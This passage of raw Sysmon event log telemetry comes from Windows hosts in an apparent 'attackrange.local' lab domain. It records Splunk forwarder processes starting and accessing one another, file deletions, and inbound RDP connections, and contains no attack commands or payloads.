Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000977572Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:41.766{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59309-false10.0.1.12-8000- 354300x8000000000000000977571Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:41.111{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50589-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x80000000000000001048931Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:44.592{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8968-6151-087A-00000000FC01}6412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048930Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:44.592{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048929Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:44.592{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048928Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:44.592{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048927Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:44.592{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048926Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:44.592{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8968-6151-087A-00000000FC01}6412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048925Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:44.592{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8968-6151-087A-00000000FC01}6412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048924Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:44.577{5EBD8912-8968-6151-087A-00000000FC01}6412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048923Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:44.126{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977576Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:45.903{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92E341302F2E5171111F66F5D63951D5,SHA256=F18A98A1496F9931BF89BA9174FAFFF283B957926CEA60CE7AD66420659676AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048952Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.975{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8969-6151-0A7A-00000000FC01}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048951Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.975{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048950Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.975{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048949Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.975{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048948Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.975{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048947Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.975{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8969-6151-0A7A-00000000FC01}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048946Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.975{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8969-6151-0A7A-00000000FC01}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048945Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.960{5EBD8912-8969-6151-0A7A-00000000FC01}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048944Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.906{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDF07800C28174DB13530E1CA70F271D,SHA256=A716C02A15A1F048CFAACA918A9F08498D6427A282A71AF3B5A6EE35DB605C88,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977575Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:42.287{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-57810-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001048943Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:44.333{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51886-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048942Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.607{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D71F52700DAF119D3B9540D5B9D7E49,SHA256=4B75E901F4841853E058888C367D1C49EC465DF83C02E09FFE33520CBFAEC11B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048941Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.276{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8969-6151-097A-00000000FC01}4948C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048940Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.276{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048939Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.276{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048938Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.276{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048937Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.276{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048936Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.276{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8969-6151-097A-00000000FC01}4948C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048935Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.276{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8969-6151-097A-00000000FC01}4948C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048934Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:45.261{5EBD8912-8969-6151-097A-00000000FC01}4948C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048955Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:46.974{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program 